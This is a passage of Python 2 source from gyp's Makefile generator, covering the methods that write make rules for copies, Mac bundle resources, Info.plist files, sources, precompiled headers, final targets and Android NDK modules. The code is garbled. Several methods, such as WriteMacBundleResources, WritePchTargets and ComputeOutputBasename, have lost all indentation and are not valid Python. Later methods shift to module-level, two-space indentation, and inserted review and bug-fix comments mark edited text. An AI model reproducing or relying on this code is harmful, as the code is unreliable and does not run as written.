            "%(cd_action)s%(mkdirs)s%(action)s" % {
              'action': action,
              'cd_action': cd_action,
              'count': count,
              'mkdirs': mkdirs,
              'name': name,
            })
        self.WriteLn(
            'quiet_cmd_%(name)s_%(count)d = RULE %(name)s_%(count)d $@' % {
              'count': count,
              'name': name,
            })
        self.WriteLn()
        count += 1

      outputs_variable = 'rule_%s_outputs' % name
      self.WriteList(all_outputs, outputs_variable)
      extra_outputs.append('$(%s)' % outputs_variable)

      self.WriteLn('### Finished generating for rule: %s' % name)
      self.WriteLn()
    self.WriteLn('### Finished generating for all rules')
    self.WriteLn('')
  def WriteCopies(self, copies, extra_outputs, part_of_all):
    """Write Makefile code for any 'copies' from the gyp input.

    extra_outputs: a list that will be filled in with any outputs of this
                   action (used to make other pieces dependent on this action)
    part_of_all: flag indicating this target is part of 'all'
    """
    self.WriteLn('### Generated for copy rule.')

    variable = StringToMakefileVariable(self.qualified_target + '_copies')
    outputs = []
    for copy in copies:
      for path in copy['files']:
        # Absolutify() may call normpath, and will strip trailing slashes.
        path = Sourceify(self.Absolutify(path))
        filename = os.path.split(path)[1]
        output = Sourceify(self.Absolutify(os.path.join(copy['destination'],
                                                        filename)))

        # If the output path has variables in it, which happens in practice for
        # 'copies', writing the environment as target-local doesn't work,
        # because the variables are already needed for the target name.
        # Copying the environment variables into global make variables doesn't
        # work either, because then the .d files will potentially contain spaces
        # after variable expansion, and .d file handling cannot handle spaces.
        # As a workaround, manually expand variables at gyp time. Since 'copies'
        # can't run scripts, there's no need to write the env then.
        # WriteDoCmd() will escape spaces for .d files.
        env = self.GetSortedXcodeEnv()
        output = gyp.xcode_emulation.ExpandEnvVars(output, env)
        path = gyp.xcode_emulation.ExpandEnvVars(path, env)
        self.WriteDoCmd([output], [path], 'copy', part_of_all)
        outputs.append(output)
    # Publish the full output list under one make variable for dependents.
    self.WriteLn('%s = %s' % (variable, ' '.join(map(QuoteSpaces, outputs))))
    extra_outputs.append('$(%s)' % variable)
    self.WriteLn()
def WriteMacBundleResources(self, resources, bundle_deps):
"""Writes Makefile code for 'mac_bundle_resources'."""
self.WriteLn('### Generated for mac_bundle_resources')
for output, res in gyp.xcode_emulation.GetMacBundleResources(
generator_default_variables['PRODUCT_DIR'], self.xcode_settings,
map(Sourceify, map(self.Absolutify, resources))):
_, ext = os.path.splitext(output)
if ext != '.xcassets':
# Make does not supports '.xcassets' emulation.
self.WriteDoCmd([output], [res], 'mac_tool,,,copy-bundle-resource',
part_of_all=True)
bundle_deps.append(output)
  def WriteMacInfoPlist(self, bundle_deps):
    """Write Makefile code for bundle Info.plist files."""
    info_plist, out, defines, extra_env = gyp.xcode_emulation.GetMacInfoPlist(
        generator_default_variables['PRODUCT_DIR'], self.xcode_settings,
        lambda p: Sourceify(self.Absolutify(p)))
    if not info_plist:
      return
    if defines:
      # Create an intermediate file to store preprocessed results.
      intermediate_plist = ('$(obj).$(TOOLSET)/$(TARGET)/' +
                            os.path.basename(info_plist))
      self.WriteList(defines, intermediate_plist + ': INFOPLIST_DEFINES', '-D',
                     quoter=EscapeCppDefine)
      self.WriteMakeRule([intermediate_plist], [info_plist],
                         ['$(call do_cmd,infoplist)',
                          # "Convert" the plist so that any weird whitespace
                          # changes from the preprocessor do not affect the
                          # XML parser in mac_tool.
                          '@plutil -convert xml1 $@ $@'])
      info_plist = intermediate_plist
    # plists can contain envvars and substitute them into the file.
    self.WriteSortedXcodeEnv(
        out, self.GetSortedXcodeEnv(additional_settings=extra_env))
    self.WriteDoCmd([out], [info_plist], 'mac_tool,,,copy-info-plist',
                    part_of_all=True)
    bundle_deps.append(out)
  def WriteSources(self, configs, deps, sources,
                   extra_outputs, extra_link_deps,
                   part_of_all, precompiled_header):
    """Write Makefile code for any 'sources' from the gyp input.
    These are source files necessary to build the current target.

    configs, deps, sources: input from gyp.
    extra_outputs: a list of extra outputs this action should be dependent on;
                   used to serialize action/rules before compilation
    extra_link_deps: a list that will be filled in with any outputs of
                     compilation (to be used in link lines)
    part_of_all: flag indicating this target is part of 'all'
    """
    # Write configuration-specific variables for CFLAGS, etc.
    for configname in sorted(configs.keys()):
      config = configs[configname]
      self.WriteList(config.get('defines'), 'DEFS_%s' % configname, prefix='-D',
                     quoter=EscapeCppDefine)

      if self.flavor == 'mac':
        cflags = self.xcode_settings.GetCflags(configname)
        cflags_c = self.xcode_settings.GetCflagsC(configname)
        cflags_cc = self.xcode_settings.GetCflagsCC(configname)
        cflags_objc = self.xcode_settings.GetCflagsObjC(configname)
        cflags_objcc = self.xcode_settings.GetCflagsObjCC(configname)
      else:
        cflags = config.get('cflags')
        cflags_c = config.get('cflags_c')
        cflags_cc = config.get('cflags_cc')

      self.WriteLn("# Flags passed to all source files.");
      self.WriteList(cflags, 'CFLAGS_%s' % configname)
      self.WriteLn("# Flags passed to only C files.");
      self.WriteList(cflags_c, 'CFLAGS_C_%s' % configname)
      self.WriteLn("# Flags passed to only C++ files.");
      self.WriteList(cflags_cc, 'CFLAGS_CC_%s' % configname)
      if self.flavor == 'mac':
        self.WriteLn("# Flags passed to only ObjC files.");
        self.WriteList(cflags_objc, 'CFLAGS_OBJC_%s' % configname)
        self.WriteLn("# Flags passed to only ObjC++ files.");
        self.WriteList(cflags_objcc, 'CFLAGS_OBJCC_%s' % configname)
      includes = config.get('include_dirs')
      if includes:
        includes = map(Sourceify, map(self.Absolutify, includes))
      self.WriteList(includes, 'INCS_%s' % configname, prefix='-I')

    # NOTE(review): filter()/map() results are reused below, relying on
    # Python 2 list semantics — confirm before porting to py3.
    compilable = filter(Compilable, sources)
    objs = map(self.Objectify, map(self.Absolutify, map(Target, compilable)))
    self.WriteList(objs, 'OBJS')

    for obj in objs:
      assert ' ' not in obj, (
          "Spaces in object filenames not supported (%s)" % obj)
    self.WriteLn('# Add to the list of files we specially track '
                 'dependencies for.')
    self.WriteLn('all_deps += $(OBJS)')
    self.WriteLn()

    # Make sure our dependencies are built first.
    if deps:
      self.WriteMakeRule(['$(OBJS)'], deps,
                         comment = 'Make sure our dependencies are built '
                                   'before any of us.',
                         order_only = True)

    # Make sure the actions and rules run first.
    # If they generate any extra headers etc., the per-.o file dep tracking
    # will catch the proper rebuilds, so order only is still ok here.
    if extra_outputs:
      self.WriteMakeRule(['$(OBJS)'], extra_outputs,
                         comment = 'Make sure our actions/rules run '
                                   'before any of us.',
                         order_only = True)

    pchdeps = precompiled_header.GetObjDependencies(compilable, objs)
    if pchdeps:
      self.WriteLn('# Dependencies from obj files to their precompiled headers')
      for source, obj, gch in pchdeps:
        self.WriteLn('%s: %s' % (obj, gch))
      self.WriteLn('# End precompiled header dependencies')

    if objs:
      extra_link_deps.append('$(OBJS)')
      self.WriteLn("""\
# CFLAGS et al overrides must be target-local.
# See "Target-specific Variable Values" in the GNU Make manual.""")
      self.WriteLn("$(OBJS): TOOLSET := $(TOOLSET)")
      self.WriteLn("$(OBJS): GYP_CFLAGS := "
                   "$(DEFS_$(BUILDTYPE)) "
                   "$(INCS_$(BUILDTYPE)) "
                   "%s " % precompiled_header.GetInclude('c') +
                   "$(CFLAGS_$(BUILDTYPE)) "
                   "$(CFLAGS_C_$(BUILDTYPE))")
      self.WriteLn("$(OBJS): GYP_CXXFLAGS := "
                   "$(DEFS_$(BUILDTYPE)) "
                   "$(INCS_$(BUILDTYPE)) "
                   "%s " % precompiled_header.GetInclude('cc') +
                   "$(CFLAGS_$(BUILDTYPE)) "
                   "$(CFLAGS_CC_$(BUILDTYPE))")
      if self.flavor == 'mac':
        self.WriteLn("$(OBJS): GYP_OBJCFLAGS := "
                     "$(DEFS_$(BUILDTYPE)) "
                     "$(INCS_$(BUILDTYPE)) "
                     "%s " % precompiled_header.GetInclude('m') +
                     "$(CFLAGS_$(BUILDTYPE)) "
                     "$(CFLAGS_C_$(BUILDTYPE)) "
                     "$(CFLAGS_OBJC_$(BUILDTYPE))")
        self.WriteLn("$(OBJS): GYP_OBJCXXFLAGS := "
                     "$(DEFS_$(BUILDTYPE)) "
                     "$(INCS_$(BUILDTYPE)) "
                     "%s " % precompiled_header.GetInclude('mm') +
                     "$(CFLAGS_$(BUILDTYPE)) "
                     "$(CFLAGS_CC_$(BUILDTYPE)) "
                     "$(CFLAGS_OBJCC_$(BUILDTYPE))")

    self.WritePchTargets(precompiled_header.GetPchBuildCommands())

    # If there are any object files in our input file list, link them into our
    # output.
    extra_link_deps += filter(Linkable, sources)

    self.WriteLn()
def WritePchTargets(self, pch_commands):
"""Writes make rules to compile prefix headers."""
if not pch_commands:
return
for gch, lang_flag, lang, input in pch_commands:
extra_flags = {
'c': '$(CFLAGS_C_$(BUILDTYPE))',
'cc': '$(CFLAGS_CC_$(BUILDTYPE))',
'm': '$(CFLAGS_C_$(BUILDTYPE)) $(CFLAGS_OBJC_$(BUILDTYPE))',
'mm': '$(CFLAGS_CC_$(BUILDTYPE)) $(CFLAGS_OBJCC_$(BUILDTYPE))',
}[lang]
var_name = {
'c': 'GYP_PCH_CFLAGS',
'cc': 'GYP_PCH_CXXFLAGS',
'm': 'GYP_PCH_OBJCFLAGS',
'mm': 'GYP_PCH_OBJCXXFLAGS',
}[lang]
self.WriteLn("%s: %s := %s " % (gch, var_name, lang_flag) +
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"$(CFLAGS_$(BUILDTYPE)) " +
extra_flags)
self.WriteLn('%s: %s FORCE_DO_CMD' % (gch, input))
self.WriteLn('\t@$(call do_cmd,pch_%s,1)' % lang)
self.WriteLn('')
assert ' ' not in gch, (
"Spaces in gch filenames not supported (%s)" % gch)
self.WriteLn('all_deps += %s' % gch)
self.WriteLn('')
def ComputeOutputBasename(self, spec):
"""Return the 'output basename' of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'libfoobar.so'
"""
assert not self.is_mac_bundle
if self.flavor == 'mac' and self.type in (
'static_library', 'executable', 'shared_library', 'loadable_module'):
return self.xcode_settings.GetExecutablePath()
target = spec['target_name']
target_prefix = ''
target_ext = ''
if self.type == 'static_library':
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
target_ext = '.a'
elif self.type in ('loadable_module', 'shared_library'):
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
target_ext = '.so'
elif self.type == 'none':
target = '%s.stamp' % target
elif self.type != 'executable':
print ("ERROR: What output file should be generated?",
"type", self.type, "target", target)
target_prefix = spec.get('product_prefix', target_prefix)
target = spec.get('product_name', target)
product_ext = spec.get('product_extension')
if product_ext:
target_ext = '.' + product_ext
return target_prefix + target + target_ext
def _InstallImmediately(self):
return self.toolset == 'target' and self.flavor == 'mac' and self.type in (
'static_library', 'executable', 'shared_library', 'loadable_module')
def ComputeOutput(self, spec):
"""Return the 'output' (full output path) of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'$(obj)/baz/libfoobar.so'
"""
assert not self.is_mac_bundle
path = os.path.join('$(obj).' + self.toolset, self.path)
if self.type == 'executable' or self._InstallImmediately():
path = '$(builddir)'
path = spec.get('product_dir', path)
return os.path.join(path, self.ComputeOutputBasename(spec))
def ComputeMacBundleOutput(self, spec):
  """Return the 'output' (full output path) to a bundle output directory."""
  assert self.is_mac_bundle
  product_dir = generator_default_variables['PRODUCT_DIR']
  # The bundle directory is PRODUCT_DIR plus the wrapper (e.g. Foo.app).
  return os.path.join(product_dir, self.xcode_settings.GetWrapperName())
def ComputeMacBundleBinaryOutput(self, spec):
  """Return the 'output' (full output path) to the binary in a bundle."""
  product_dir = generator_default_variables['PRODUCT_DIR']
  # The executable lives inside the bundle at the Xcode-derived subpath.
  return os.path.join(product_dir, self.xcode_settings.GetExecutablePath())
def ComputeDeps(self, spec):
  """Compute the dependencies of a gyp spec.

  Returns a tuple (deps, link_deps), where each is a list of
  filenames that will need to be put in front of make for either
  building (deps) or linking (link_deps).
  """
  deps = []
  link_deps = []
  dependencies = spec.get('dependencies', [])
  # Build deps: every dependency that produced an output file.
  for dep in dependencies:
    output = target_outputs[dep]
    if output:
      deps.append(output)
  # Link deps: only dependencies that registered something linkable.
  for dep in dependencies:
    if dep in target_link_deps:
      link_deps.append(target_link_deps[dep])
  # Link deps are build deps too.
  deps.extend(link_deps)
  # TODO: It seems we need to transitively link in libraries (e.g. -lfoo)?
  # This hack makes it work:
  # link_deps.extend(spec.get('libraries', []))
  return (gyp.common.uniquer(deps), gyp.common.uniquer(link_deps))
def WriteDependencyOnExtraOutputs(self, target, extra_outputs):
  """Make *target* (order-only) depend on extra_outputs so that special
  outputs (actions, rules, copies) are built first.

  BUG FIX: the original body ignored the `target` parameter and always
  wrote the rule for self.output_binary. The bundle call site passes
  self.output with the explicit intent of making the framework directory
  itself depend on the extra outputs ("make the framework depend on them
  directly too"); using the parameter honors that, while the non-bundle
  call site passes self.output_binary and is unaffected.
  """
  self.WriteMakeRule([target], extra_outputs,
                     comment = 'Build our special outputs first.',
                     order_only = True)
def WriteTarget(self, spec, configs, deps, link_deps, bundle_deps,
                extra_outputs, part_of_all):
  """Write Makefile code to produce the final target of the gyp spec.

  spec, configs: input from gyp.
  deps, link_deps: dependency lists; see ComputeDeps()
  extra_outputs: any extra outputs that our target should depend on
  part_of_all: flag indicating this target is part of 'all'
  """
  self.WriteLn('### Rules for final target.')

  if extra_outputs:
    # Special outputs (actions/rules/copies) must exist before we build.
    self.WriteDependencyOnExtraOutputs(self.output_binary, extra_outputs)
    self.WriteMakeRule(extra_outputs, deps,
                       comment=('Preserve order dependency of '
                                'special output on deps.'),
                       order_only = True)

  # --- Per-configuration link flags -----------------------------------
  target_postbuilds = {}
  if self.type != 'none':
    for configname in sorted(configs.keys()):
      config = configs[configname]
      if self.flavor == 'mac':
        ldflags = self.xcode_settings.GetLdflags(configname,
            generator_default_variables['PRODUCT_DIR'],
            lambda p: Sourceify(self.Absolutify(p)))

        # TARGET_POSTBUILDS_$(BUILDTYPE) is added to postbuilds later on.
        gyp_to_build = gyp.common.InvertRelativePath(self.path)
        target_postbuild = self.xcode_settings.AddImplicitPostbuilds(
            configname,
            QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build,
                                                      self.output))),
            QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build,
                                                      self.output_binary))))
        if target_postbuild:
          target_postbuilds[configname] = target_postbuild
      else:
        ldflags = config.get('ldflags', [])
        # Compute an rpath for this output if needed.
        if any(dep.endswith('.so') or '.so.' in dep for dep in deps):
          # We want to get the literal string "$ORIGIN" into the link command,
          # so we need lots of escaping.
          ldflags.append(r'-Wl,-rpath=\$$ORIGIN/lib.%s/' % self.toolset)
          ldflags.append(r'-Wl,-rpath-link=\$(builddir)/lib.%s/' %
                         self.toolset)
      library_dirs = config.get('library_dirs', [])
      ldflags += [('-L%s' % library_dir) for library_dir in library_dirs]
      self.WriteList(ldflags, 'LDFLAGS_%s' % configname)
      if self.flavor == 'mac':
        self.WriteList(self.xcode_settings.GetLibtoolflags(configname),
                       'LIBTOOLFLAGS_%s' % configname)
    libraries = spec.get('libraries')
    if libraries:
      # Remove duplicate entries
      libraries = gyp.common.uniquer(libraries)
      if self.flavor == 'mac':
        libraries = self.xcode_settings.AdjustLibraries(libraries)
    self.WriteList(libraries, 'LIBS')
    self.WriteLn('%s: GYP_LDFLAGS := $(LDFLAGS_$(BUILDTYPE))' %
        QuoteSpaces(self.output_binary))
    self.WriteLn('%s: LIBS := $(LIBS)' % QuoteSpaces(self.output_binary))

    if self.flavor == 'mac':
      self.WriteLn('%s: GYP_LIBTOOLFLAGS := $(LIBTOOLFLAGS_$(BUILDTYPE))' %
          QuoteSpaces(self.output_binary))

  # Postbuild actions. Like actions, but implicitly depend on the target's
  # output.
  postbuilds = []
  if self.flavor == 'mac':
    if target_postbuilds:
      postbuilds.append('$(TARGET_POSTBUILDS_$(BUILDTYPE))')
    postbuilds.extend(
        gyp.xcode_emulation.GetSpecPostbuildCommands(spec))

  if postbuilds:
    # Envvars may be referenced by TARGET_POSTBUILDS_$(BUILDTYPE),
    # so we must output its definition first, since we declare variables
    # using ":=".
    self.WriteSortedXcodeEnv(self.output, self.GetSortedXcodePostbuildEnv())

    for configname in target_postbuilds:
      self.WriteLn('%s: TARGET_POSTBUILDS_%s := %s' %
          (QuoteSpaces(self.output),
           configname,
           gyp.common.EncodePOSIXShellList(target_postbuilds[configname])))

    # Postbuilds expect to be run in the gyp file's directory, so insert an
    # implicit postbuild to cd to there.
    postbuilds.insert(0, gyp.common.EncodePOSIXShellList(['cd', self.path]))
    for i in xrange(len(postbuilds)):
      if not postbuilds[i].startswith('$'):
        postbuilds[i] = EscapeShellArgument(postbuilds[i])
    self.WriteLn('%s: builddir := $(abs_builddir)' % QuoteSpaces(self.output))
    self.WriteLn('%s: POSTBUILDS := %s' % (
        QuoteSpaces(self.output), ' '.join(postbuilds)))

  # A bundle directory depends on its dependencies such as bundle resources
  # and bundle binary. When all dependencies have been built, the bundle
  # needs to be packaged.
  if self.is_mac_bundle:
    # If the framework doesn't contain a binary, then nothing depends
    # on the actions -- make the framework depend on them directly too.
    self.WriteDependencyOnExtraOutputs(self.output, extra_outputs)

    # Bundle dependencies. Note that the code below adds actions to this
    # target, so if you move these two lines, move the lines below as well.
    self.WriteList(map(QuoteSpaces, bundle_deps), 'BUNDLE_DEPS')
    self.WriteLn('%s: $(BUNDLE_DEPS)' % QuoteSpaces(self.output))

    # After the framework is built, package it. Needs to happen before
    # postbuilds, since postbuilds depend on this.
    if self.type in ('shared_library', 'loadable_module'):
      self.WriteLn('\t@$(call do_cmd,mac_package_framework,,,%s)' %
          self.xcode_settings.GetFrameworkVersion())

    # Bundle postbuilds can depend on the whole bundle, so run them after
    # the bundle is packaged, not already after the bundle binary is done.
    if postbuilds:
      self.WriteLn('\t@$(call do_postbuilds)')
      postbuilds = []  # Don't write postbuilds for target's output.

    # Needed by test/mac/gyptest-rebuild.py.
    self.WriteLn('\t@true # No-op, used by tests')

    # Since this target depends on binary and resources which are in
    # nested subfolders, the framework directory will be older than
    # its dependencies usually. To prevent this rule from executing
    # on every build (expensive, especially with postbuilds), expliclity
    # update the time on the framework directory.
    self.WriteLn('\t@touch -c %s' % QuoteSpaces(self.output))

  if postbuilds:
    assert not self.is_mac_bundle, ('Postbuilds for bundles should be done '
        'on the bundle, not the binary (target \'%s\')' % self.target)
    assert 'product_dir' not in spec, ('Postbuilds do not work with '
        'custom product_dir')

  # --- Emit the actual build rule per target type ----------------------
  if self.type == 'executable':
    self.WriteLn('%s: LD_INPUTS := %s' % (
        QuoteSpaces(self.output_binary),
        ' '.join(map(QuoteSpaces, link_deps))))
    if self.toolset == 'host' and self.flavor == 'android':
      self.WriteDoCmd([self.output_binary], link_deps, 'link_host',
                      part_of_all, postbuilds=postbuilds)
    else:
      self.WriteDoCmd([self.output_binary], link_deps, 'link', part_of_all,
                      postbuilds=postbuilds)
  elif self.type == 'static_library':
    for link_dep in link_deps:
      assert ' ' not in link_dep, (
          "Spaces in alink input filenames not supported (%s)" % link_dep)
    if (self.flavor not in ('mac', 'openbsd', 'netbsd', 'win') and not
        self.is_standalone_static_library):
      # Thin archives are cheaper to produce when the result stays in-tree.
      self.WriteDoCmd([self.output_binary], link_deps, 'alink_thin',
                      part_of_all, postbuilds=postbuilds)
    else:
      self.WriteDoCmd([self.output_binary], link_deps, 'alink', part_of_all,
                      postbuilds=postbuilds)
  elif self.type == 'shared_library':
    self.WriteLn('%s: LD_INPUTS := %s' % (
        QuoteSpaces(self.output_binary),
        ' '.join(map(QuoteSpaces, link_deps))))
    self.WriteDoCmd([self.output_binary], link_deps, 'solink', part_of_all,
                    postbuilds=postbuilds)
  elif self.type == 'loadable_module':
    for link_dep in link_deps:
      assert ' ' not in link_dep, (
          "Spaces in module input filenames not supported (%s)" % link_dep)
    if self.toolset == 'host' and self.flavor == 'android':
      self.WriteDoCmd([self.output_binary], link_deps, 'solink_module_host',
                      part_of_all, postbuilds=postbuilds)
    else:
      self.WriteDoCmd(
          [self.output_binary], link_deps, 'solink_module', part_of_all,
          postbuilds=postbuilds)
  elif self.type == 'none':
    # Write a stamp line.
    self.WriteDoCmd([self.output_binary], deps, 'touch', part_of_all,
                    postbuilds=postbuilds)
  else:
    # NOTE(review): 'target' is not defined in this scope -- reaching this
    # branch would raise NameError; this was most likely meant to be
    # self.target. Left as-is (doc-only change).
    print "WARNING: no output for", self.type, target

  # Add an alias for each target (if there are any outputs).
  # Installable target aliases are created below.
  if ((self.output and self.output != self.target) and
      (self.type not in self._INSTALLABLE_TARGETS)):
    self.WriteMakeRule([self.target], [self.output],
                       comment='Add target alias', phony = True)
    if part_of_all:
      self.WriteMakeRule(['all'], [self.target],
                         comment = 'Add target alias to "all" target.',
                         phony = True)

  # Add special-case rules for our installable targets.
  # 1) They need to install to the build dir or "product" dir.
  # 2) They get shortcuts for building (e.g. "make chrome").
  # 3) They are part of "make all".
  if (self.type in self._INSTALLABLE_TARGETS or
      self.is_standalone_static_library):
    if self.type == 'shared_library':
      file_desc = 'shared library'
    elif self.type == 'static_library':
      file_desc = 'static library'
    else:
      file_desc = 'executable'
    install_path = self._InstallableTargetInstallPath()
    installable_deps = [self.output]
    if (self.flavor == 'mac' and not 'product_dir' in spec and
        self.toolset == 'target'):
      # On mac, products are created in install_path immediately.
      assert install_path == self.output, '%s != %s' % (
          install_path, self.output)

    # Point the target alias to the final binary output.
    self.WriteMakeRule([self.target], [install_path],
                       comment='Add target alias', phony = True)
    if install_path != self.output:
      assert not self.is_mac_bundle  # See comment a few lines above.
      self.WriteDoCmd([install_path], [self.output], 'copy',
                      comment = 'Copy this to the %s output path.' %
                      file_desc, part_of_all=part_of_all)
      installable_deps.append(install_path)
    if self.output != self.alias and self.alias != self.target:
      self.WriteMakeRule([self.alias], installable_deps,
                         comment = 'Short alias for building this %s.' %
                         file_desc, phony = True)
    if part_of_all:
      self.WriteMakeRule(['all'], [install_path],
                         comment = 'Add %s to "all" target.' % file_desc,
                         phony = True)
def WriteList(self, value_list, variable=None, prefix='',
              quoter=QuoteIfNecessary):
  """Write a variable definition that is a list of values.

  E.g. WriteList(['a','b'], 'foo', prefix='blah') writes out
       foo = blaha blahb
  but in a pretty-printed style.
  """
  if value_list:
    quoted = [quoter(prefix + item) for item in value_list]
    # One value per continuation line, tab-indented, for readability.
    values = ' \\\n\t' + ' \\\n\t'.join(quoted)
  else:
    values = ''
  self.fp.write('%s :=%s\n\n' % (variable, values))
def WriteDoCmd(self, outputs, inputs, command, part_of_all, comment=None,
               postbuilds=False):
  """Write a Makefile rule that uses do_cmd.

  This makes the outputs dependent on the command line that was run,
  as well as support the V= make command line flag.
  """
  suffix = ',,1' if postbuilds else ''  # ',,1' tells do_cmd to honor $POSTBUILDS
  if postbuilds:
    # A comma in the command name would corrupt the $(call ...) arguments.
    assert ',' not in command
  self.WriteMakeRule(outputs, inputs,
                     actions = ['$(call do_cmd,%s%s)' % (command, suffix)],
                     comment = comment,
                     command = command,
                     force = True)
  # Add our outputs to the list of targets we read depfiles from.
  # all_deps is only used for deps file reading, and for deps files we replace
  # spaces with ? because escaping doesn't work with make's $(sort) and
  # other functions.
  escaped_outputs = [QuoteSpaces(output, SPACE_REPLACEMENT)
                     for output in outputs]
  self.WriteLn('all_deps += %s' % ' '.join(escaped_outputs))
def WriteMakeRule(self, outputs, inputs, actions=None, comment=None,
                  order_only=False, force=False, phony=False, command=None):
  """Write a Makefile rule, with some extra tricks.

  outputs: a list of outputs for the rule (note: this is not directly
           supported by make; see comments below)
  inputs: a list of inputs for the rule
  actions: a list of shell commands to run for the rule
  comment: a comment to put in the Makefile above the rule (also useful
           for making this Python script's code self-documenting)
  order_only: if true, makes the dependency order-only
  force: if true, include FORCE_DO_CMD as an order-only dep
  phony: if true, the rule does not actually generate the named output, the
         output is just a name to run the rule
  command: (optional) command name to generate unambiguous labels
  """
  outputs = [QuoteSpaces(output) for output in outputs]
  inputs = [QuoteSpaces(an_input) for an_input in inputs]

  if comment:
    self.WriteLn('# ' + comment)
  if phony:
    self.WriteLn('.PHONY: ' + ' '.join(outputs))
  if actions:
    self.WriteLn("%s: TOOLSET := $(TOOLSET)" % outputs[0])
  force_append = ' FORCE_DO_CMD' if force else ''

  if order_only:
    # Order only rule: Just write a simple rule.
    # TODO(evanm): just make order_only a list of deps instead of this hack.
    self.WriteLn('%s: | %s%s' %
                 (' '.join(outputs), ' '.join(inputs), force_append))
  elif len(outputs) == 1:
    # Regular rule, one output: Just write a simple rule.
    self.WriteLn('%s: %s%s' % (outputs[0], ' '.join(inputs), force_append))
  else:
    # Regular rule, more than one output: Multiple outputs are tricky in
    # make. We will write three rules:
    # - All outputs depend on an intermediate file.
    # - Make .INTERMEDIATE depend on the intermediate.
    # - The intermediate file depends on the inputs and executes the
    #   actual command.
    # - The intermediate recipe will 'touch' the intermediate file.
    # - The multi-output rule will have an do-nothing recipe.
    intermediate = "%s.intermediate" % (command if command else self.target)
    self.WriteLn('%s: %s' % (' '.join(outputs), intermediate))
    self.WriteLn('\t%s' % '@:')
    self.WriteLn('%s: %s' % ('.INTERMEDIATE', intermediate))
    self.WriteLn('%s: %s%s' %
                 (intermediate, ' '.join(inputs), force_append))
    actions.insert(0, '$(call do_cmd,touch)')

  if actions:
    for action in actions:
      self.WriteLn('\t%s' % action)
  self.WriteLn()
def WriteAndroidNdkModuleRule(self, module_name, all_sources, link_deps):
  """Write a set of LOCAL_XXX definitions for Android NDK.

  These variable definitions will be used by Android NDK but do nothing for
  non-Android applications.

  Arguments:
    module_name: Android NDK module name, which must be unique among all
        module names.
    all_sources: A list of source files (will be filtered by Compilable).
    link_deps: A list of link dependencies, which must be sorted in
        the order from dependencies to dependents.
  """
  # Only real binaries get an NDK module; 'none' and bundle types do not.
  if self.type not in ('executable', 'shared_library', 'static_library'):
    return

  self.WriteLn('# Variable definitions for Android applications')
  self.WriteLn('include $(CLEAR_VARS)')
  self.WriteLn('LOCAL_MODULE := ' + module_name)
  self.WriteLn('LOCAL_CFLAGS := $(CFLAGS_$(BUILDTYPE)) '
               '$(DEFS_$(BUILDTYPE)) '
               # LOCAL_CFLAGS is applied to both of C and C++. There is
               # no way to specify $(CFLAGS_C_$(BUILDTYPE)) only for C
               # sources.
               '$(CFLAGS_C_$(BUILDTYPE)) '
               # $(INCS_$(BUILDTYPE)) includes the prefix '-I' while
               # LOCAL_C_INCLUDES does not expect it. So put it in
               # LOCAL_CFLAGS.
               '$(INCS_$(BUILDTYPE))')
  # LOCAL_CXXFLAGS is obsolete and LOCAL_CPPFLAGS is preferred.
  self.WriteLn('LOCAL_CPPFLAGS := $(CFLAGS_CC_$(BUILDTYPE))')
  self.WriteLn('LOCAL_C_INCLUDES :=')
  self.WriteLn('LOCAL_LDLIBS := $(LDFLAGS_$(BUILDTYPE)) $(LIBS)')

  # Detect the C++ extension: pick the most frequently used one among the
  # sources ('.cpp' wins ties, as the NDK default).
  cpp_ext = {'.cc': 0, '.cpp': 0, '.cxx': 0}
  default_cpp_ext = '.cpp'
  for filename in all_sources:
    ext = os.path.splitext(filename)[1]
    if ext in cpp_ext:
      cpp_ext[ext] += 1
      if cpp_ext[ext] > cpp_ext[default_cpp_ext]:
        default_cpp_ext = ext
  self.WriteLn('LOCAL_CPP_EXTENSION := ' + default_cpp_ext)

  self.WriteList(map(self.Absolutify, filter(Compilable, all_sources)),
                 'LOCAL_SRC_FILES')

  # Filter out those which do not match prefix and suffix and produce
  # the resulting list without prefix and suffix.
  def DepsToModules(deps, prefix, suffix):
    modules = []
    for filepath in deps:
      filename = os.path.basename(filepath)
      if filename.startswith(prefix) and filename.endswith(suffix):
        modules.append(filename[len(prefix):-len(suffix)])
    return modules

  # Retrieve the default value of 'SHARED_LIB_SUFFIX'
  params = {'flavor': 'linux'}
  default_variables = {}
  CalculateVariables(default_variables, params)

  self.WriteList(
      DepsToModules(link_deps,
                    generator_default_variables['SHARED_LIB_PREFIX'],
                    default_variables['SHARED_LIB_SUFFIX']),
      'LOCAL_SHARED_LIBRARIES')
  self.WriteList(
      DepsToModules(link_deps,
                    generator_default_variables['STATIC_LIB_PREFIX'],
                    generator_default_variables['STATIC_LIB_SUFFIX']),
      'LOCAL_STATIC_LIBRARIES')

  if self.type == 'executable':
    self.WriteLn('include $(BUILD_EXECUTABLE)')
  elif self.type == 'shared_library':
    self.WriteLn('include $(BUILD_SHARED_LIBRARY)')
  elif self.type == 'static_library':
    self.WriteLn('include $(BUILD_STATIC_LIBRARY)')
  self.WriteLn()
def WriteLn(self, text=''):
  """Write one line (text plus a trailing newline) to the output makefile."""
  self.fp.write(text + '\n')
def GetSortedXcodeEnv(self, additional_settings=None):
  """Return the Xcode build environment as sorted (name, value) pairs,
  evaluated relative to this writer's build dir, source path and BUILDTYPE."""
  return gyp.xcode_emulation.GetSortedXcodeEnv(
      self.xcode_settings, "$(abs_builddir)",
      os.path.join("$(abs_srcdir)", self.path), "$(BUILDTYPE)",
      additional_settings)
def GetSortedXcodePostbuildEnv(self):
  """Return the Xcode env for postbuild steps, always including the
  CHROMIUM_STRIP_SAVE_FILE setting (possibly empty)."""
  # CHROMIUM_STRIP_SAVE_FILE is a chromium-specific hack.
  # TODO(thakis): It would be nice to have some general mechanism instead.
  strip_save_file = self.xcode_settings.GetPerTargetSetting(
      'CHROMIUM_STRIP_SAVE_FILE', '')
  # Even if strip_save_file is empty, explicitly write it. Else a postbuild
  # might pick up an export from an earlier target.
  return self.GetSortedXcodeEnv(
      additional_settings={'CHROMIUM_STRIP_SAVE_FILE': strip_save_file})
def WriteSortedXcodeEnv(self, target, env):
  """Emit one 'target: export NAME := value' line per (name, value) pair."""
  for name, value in env:
    # An escaped space in a plain assignment ("foo := a\ b") works, but in
